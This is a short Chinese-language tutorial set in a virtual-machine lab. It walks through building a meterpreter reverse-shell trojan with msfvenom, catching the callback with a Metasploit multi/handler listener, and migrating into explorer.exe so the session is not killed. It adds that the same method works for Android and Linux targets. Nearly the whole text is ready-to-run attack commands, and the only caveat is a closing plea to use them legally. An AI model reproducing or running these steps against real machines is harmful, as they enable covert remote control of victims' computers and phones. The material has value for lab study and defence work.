Kali Linux(攻击者)
Windows或其他系统(受害者)
环境:Kali Linux 64位 IP地址:192.168. 0.107桥接模式Windows7 32位 IP地址:192.168.0.108 NAT模式两者均在虚拟机下且处于同一网段
Kali和Win7互ping一下,确保网络畅通
Kali打开终端,输入以下命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /root/hack.exe windows是系统的类型,lhost是Kali的IP,即接受端,lport是端口,这里用4444端口,exe是文件类型,即Windows下的可执行文件,/root/hack.exe是文件存放位置
生成木马后将其放到Windows7下,等待运行
依次在终端输入以下命令:msfconsoleuse exploit/multi/handler 调用模块set payload windows/meterpreter/reverse_tcp 调用payload set LHOST 192.168.0.107 Kali的IPset LPORT 4444 与前面设置的端口一致exploit 进行等待,只要主机打开木马,就可以探测到
打开Windows7下的木马文件,Kali探测到
因为进程可能很快会被结束,所以要进程注入输入ps,查看进程列表,找到explorer.exe(或其他系统进程,保证不会被关闭)。查看PID,输入migrate +PID,如migrate 1768
接下来就可以操作了,使用help查看命令,使用exit退出
安卓同理,只是将生成木马时windows改为android,exe改为apk,/root/hack.exe改为/root/hack.apk
Linux同理
务必合法使用!!!